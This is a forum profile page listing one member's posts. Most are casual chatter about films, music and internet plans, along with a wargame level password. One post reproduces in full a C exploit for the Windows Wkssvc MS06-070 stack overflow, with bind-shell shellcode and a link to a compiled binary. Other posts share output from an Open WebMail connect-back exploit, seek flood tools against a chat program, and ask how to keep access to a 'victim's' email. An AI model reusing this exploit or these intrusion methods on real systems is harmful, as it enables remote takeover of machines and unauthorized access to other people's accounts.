Christian

Active Members
  • Posts

    90
Everything posted by Christian

  1. I already knew that... but I can't find any nuker that has any effect on it... anyway, we're already starting to go off-topic.
  2. But don't you have anything for Vypress? This one has no effect either... I haven't found a flood program for it.
  3. Marc et Claude - Tremble (vinil club mix) & in the queue: Happy Fathers - Bounce
  4. I also have a connection over PPPoE (not ierdeesh) with 3 pricing plans: 1. Non-stop net = 10$ 2. 12 hours/day = 7$ 3. 200 hours/month = 7$. But I understand that with the 3rd option there is a trick that lets you connect even after you have used up the 200 hours... does anyone know anything??
  5. Honestly, it wouldn't hurt you either :@ It probably doesn't work only in a LAN... the IP you send the shutdown to has to have port 135 (or 445... I'm not sure) open... but most providers block these ports and in most cases it won't work.
  6. Come on, you're already drifting into sci-fi... now I'm starting to understand why some films are forbidden for children under 12. Anyway, the story about the virus called stupidity is REAL!! I know a few infected people... luckily it isn't contagious.
  7. Which version of Windows is affected? I suppose Win2k. I tried on WinXP SP1 and SP2 and it doesn't work...
  8. I don't think he would do that... he is trying hard to rise in Romanians' eyes... you can imagine how Romanians would look at him if he kicked them out of their houses. So what... aren't you having fun? That's your opinion! He knows what he knows... look, God helped him today too... he drew with Pandurii :@ great luck. They certainly don't have the golden fleece, but he has the cogs in his head well oiled. Conclusion... JIJI RULZZZZZZZ !!! :@
  9. /***************************************************************************
      Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

      by cocoruder(frankruder_at_hotmail.com),2006.11.15
      page:http://ruder.cdut.net/default.asp

      Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
      correct jmp EBX address and fixed exploit output status.

      Should work on Windows 2000 Server SP4 (All Languages)

      usage:
      ms06070 targetip DomainName

      notice:
      Make sure the DomainName is valid and live,more informations see
      http://research.eeye.com/html/advisories/published/AD20061114.html,
      cocoruder just research the vulnerability and give the exploit for Win2000.
      ****************************************************************************/

      #include <stdio.h>
      #include <windows.h>
      #include <winsock.h>
      #include <tchar.h>

      #pragma comment(lib, "wsock32.lib")

      unsigned char SmbNeg[] = /* ... */;
      unsigned char Session_Setup_AndX_Request[] = /* ... */;
      unsigned char TreeConnect_AndX_Request[] = /* ... */;
      unsigned char NTCreate_AndX_Request[] = /* ... */;
      unsigned char Rpc_Bind_Wkssvc[] = /* ... */;
      unsigned char Rpc_NetrJoinDomain2_Header[] = /* ... */;

      unsigned char Rpc_NetrJoinDomain2_End[]=
          "\x00\x00\x00\x00"
          "\x00\x00\x00\x00"
          "\x00\x00\x00\x00"
          "\x01\x00\x00\x00";

      unsigned char *lpDomainName=NULL;
      DWORD dwDomainNameLen=0;

      /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
      unsigned char shellcode[] = /* ... */;

      DWORD fill_len_1 =0x84c;          //fill data
      DWORD fill_len_2 =0x1000;         //fill rubbish data
      DWORD addr_jmp_ebx=0x77F92A9B;    //jmp ebx address,in ntdll.dll
      unsigned char code_jmp8[]=        //jmp 8
          "\xEB\x06\x90\x90";

      unsigned char *Rpc_NetrJoinDomain2=NULL;
      DWORD dwRpc_NetrJoinDomain2=0;

      unsigned char recvbuff[2048];

      void showinfo(void)
      {
          printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
          printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
          printf("page:http://ruder.cdut.net/default.asp\n\n");
          printf("Code fixed by S A Stevens - 16.11.2006\n");
          printf("Should work on Windows 2000 Server SP4 (All Languages)\n\n");
          printf("usage:\n");
          printf("ms06070 targetip DomainName\n\n");
          printf("notice:\n");
          printf("Make sure the DomainName is valid and live,more informations see\n");
          printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
          printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
      }

      void neg ( int s )
      {
          char response[1024];

          memset(response,0,sizeof(response));
          send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
      }

      void MakeAttackPacket(char *lpDomainNameStr)
      {
          DWORD j,len,b_flag;

          dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
          lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

          memset(lpDomainName,0,dwDomainNameLen);

          MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

          *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
          *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

          len=dwDomainNameLen+          //DomainName
              fill_len_1-3*2+           //fill_len_1
              4+                        //jmp 8
              4+                        //addr jmp ebx
              sizeof(shellcode)-1+      //shellcode
              fill_len_2+               //fill_len_2
              2;                        //0x0000

          b_flag=0;
          if (len%2==1)
          {
              len++;
              b_flag=1;
          }

          dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
              len+
              sizeof(Rpc_NetrJoinDomain2_End)-1;   //end

          //malloc
          Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
          if (Rpc_NetrJoinDomain2==NULL)
          {
              printf("malloc error!\n");
              return;
          }

          //fill nop
          memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);

          j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

          //update para1 length
          *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
          *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;

          //copy header
          memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
          j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

          //copy DomainName
          memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
          j=j+dwDomainNameLen;

          //calculate offset
          j=j+fill_len_1-3*2;

          //jmp 8
          memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
          j=j+4;

          //jmp ebx address
          *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
          j=j+4;

          //copy shellcode
          memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
          j=j+sizeof(shellcode)-1;

          //fill data
          memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
          j=j+fill_len_2;

          //0x0000(NULL)
          if (b_flag==0)
          {
              Rpc_NetrJoinDomain2[j]=0x00;
              Rpc_NetrJoinDomain2[j+1]=0x00;
              j=j+2;
          }
          else if (b_flag==1)
          {
              Rpc_NetrJoinDomain2[j]=0x00;
              Rpc_NetrJoinDomain2[j+1]=0x00;
              Rpc_NetrJoinDomain2[j+2]=0x00;
              j=j+3;
          }

          //copy other parameter
          memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
          j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
      }

      void main(int argc,char **argv)
      {
          WSADATA ws;
          struct sockaddr_in server;
          SOCKET sock;
          DWORD ret;
          WORD userid,treeid,fid;

          WSAStartup(MAKEWORD(2,2),&ws);

          sock = socket(AF_INET,SOCK_STREAM,0);
          if(sock<=0)
          {
              return;
          }

          server.sin_family = AF_INET;
          server.sin_addr.s_addr = inet_addr(argv[1]);
          server.sin_port = htons((USHORT)445);

          printf("[+] Connecting %s\n",argv[1]);

          ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
          if (ret==-1)
          {
              printf("Connection Error, Port 445 Firewalled?\n");
              return;
          }

          neg(sock);

          recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

          ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
          if (ret<=0)
          {
              printf("send Session_Setup_AndX_Request error!\n");
              return;
          }
          recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

          userid=*(WORD *)(recvbuff+0x20);    //get userid

          memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2);    //update userid

          ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
          if (ret<=0)
          {
              printf("send TreeConnect_AndX_Request error!\n");
              return;
          }
          recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

          treeid=*(WORD *)(recvbuff+0x1c);    //get treeid

          //send NTCreate_AndX_Request
          memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);    //update userid
          memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);    //update treeid

          ret=send(sock,(char *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
          if (ret<=0)
          {
              printf("send NTCreate_AndX_Request error!\n");
              return;
          }
          recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

          fid=*(WORD *)(recvbuff+0x2a);    //get fid

          //rpc bind
          memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
          memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
          memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
          *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

          ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
          if (ret<=0)
          {
              printf("send Rpc_Bind_Wkssvc error!\n");
              return;
          }
          recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

          MakeAttackPacket((char *)argv[2]);

          memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
          memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
          memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);

          *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

          *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;    //update Total Data Count
          *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;    //update Data Count
          *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;    //update Byte Count
          *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;    //update Frag Length

          ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
          if (ret<=0)
          {
              printf("send Rpc_NetrJoinDomain2 error!\n");
              return;
          }

          printf("[+] Sent attack packet successfully, Try telnet on %s:4443?\n",argv[1]);

          recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

          closesocket(sock);
      }

      // milw0rm.com [2006-11-17]

      and the compiled version: http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar
  10. I apologize... I lost the previous version, source and all, after an unscheduled format, and I made this version afterwards, in a hurry, and I probably got something wrong... I'll make time these days to fix any mistakes :@
  11. It isn't completely invisible. With the command attrib +H +S you make it Hidden and System, but if you go to Folder Options > Show hidden files and folders and uncheck Hide protected operating system files, you will see it. Yep... u`r right, but let's be serious... how many people do you think know about that option? I for one didn't.
  12. There would also be a 3rd option, namely hiding it with the attrib command, e.g. in CMD you run the command "attrib +H +S FolderName"; this way the folder will be completely invisible.
  13. New link: http://share.urbanfriends.us/savefile_php/uploads/6df49cee38.rar
  14. I really needed an exploit for Open WebMail... I tested it on Open WebMail version 1.81 and the result is:
      [+] Listen on port: 4444
      [+] Prepairing ShellCode...Done!
      [+] Inject Shellcode to out host...Done!
      [+] Chmod our ShellCode on host...Done!
      [+] Exec ShellCode...Done!
      [+] Wait for Connect-back
      Can't Hack
      User defined signal 2
      any ideas? :?
  15. 10x ppl! I haven't seen most of the films you mentioned, so I have a lot to download, no joke... lucky that my provider raised my download speed again. Btw, if anyone knows more film titles worth a look, I don't think anyone would mind if you posted them here.
  16. Smart noob, in case you didn't realize, it's 150% a joke, probably made because of some people's insistence on convincing him to do who knows what for them. n00b, what would I do without you? I'd probably be better off. I realized it was a joke and I replied with another joke, n00b.
  17. What films have you seen lately that left you with a good impression? Can someone point me to 1-2 good films? (newer ones if possible) Because honestly I'm sick of watching totally crap films (and when I say totally crap I mean TOTALLY CRAP!!!). I don't want to waste any more time on films like that, so... give me some names !?!
  18. Happy birthday SpiridusuCaddy!! May you have money and riches... but tell me where you keep them.
  19. 10x virusz for the programs. I for one get along well with rapidshare... I download from them at full speed (62 kB/s), whereas from urban I get 30 kB/s at most. The only disadvantage is that files on rapidshare expire fairly quickly. Speaking of VC++... in case anyone grabs it... it won't install just by running Setup.exe... to install it, follow these steps:
      1. Make a copy of the file setup/VS98ENT.STF and rename it to acmsetup.STF
      2. Copy everything in the /setup/ folder into the parent folder (the one that contains ACMBOOT.EXE)
         * Don't forget to put acmsetup.STF in the folder that contains ACMBOOT.EXE as well
      3. Install by running acmsetup.exe or Setup.exe
      4. Enjoy it!
      I haven't tested the other programs and I don't know whether they cause problems on install.
  20. Scarto can write in Chinese too for all it matters... since it's a VIDEO TUTORIAL you should understand it. Nice post, YceFire.
  21. http://share.urbanfriends.us/uploads/3af7c572f1.rar Don't cheat on the tests and don't post their answers, so that as many people as possible can do them.
  22. This one is selling cucumbers to the gardener :@ How lame! =) It's an .exe archive (most likely bots), more precisely a trojan downloader.
  23. eddie47, are you sure you also tried "neptune"? Btw, Uranus is the 7th planet from the sun.
  24. function Try(passwd) {
          if (passwd == "h4x0r") {
              alert("Alright! On to level 2...");
              location.href = "level2-xfdgnh.xhtml";
          } else {
              alert("The password is incorrect. Please don't try again.");
              location.href = "http://www.disney.com/";
          }
      }
      You can find this in the page source, but what charm does the game have left if someone else tells you the answers? Try to discover them yourself.
  25. This method seems safer to me than the one with the browser cookie. Is there any way I can have access to the victim's mail for more than 24 h?